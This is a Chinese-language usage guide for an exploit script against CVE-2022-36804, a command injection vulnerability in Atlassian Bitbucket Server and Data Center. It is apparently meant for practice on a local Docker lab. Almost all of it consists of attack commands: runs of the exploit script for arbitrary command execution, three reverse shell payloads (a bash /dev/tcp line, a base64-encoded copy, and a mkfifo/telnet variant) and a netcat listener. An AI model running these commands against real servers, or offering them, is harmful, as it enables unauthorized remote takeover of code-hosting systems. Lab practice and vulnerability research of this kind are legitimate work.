
在 Atlassian Bitbucket Server 和 Data Center 的多个 API 端点中发现了一个严重命令注入漏洞。该漏洞影响所有版本低于 <7.6.17>、<7.17.10>、<7.21.4>、<8.0.3>、<8.1.2>、<8.2.2> 和 <8.3.1> 的 Bitbucket Server 和 Data Center。
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7
将 172.17.0.3 替换为你的本地 IP 地址
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
使用以下命令启动 netcat 监听器:
nc -lvp 4444
如果遇到 Payload 执行错误,将 /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 转换为 base64 格式。
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
如果仍然遇到错误,请执行以下命令:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
建议在 Windows/Linux 机器上安装存在漏洞的 Bitbucket 服务器版本进行练习。与 Docker 镜像相比,这样更容易实现反向 Shell。
更多信息可参见此处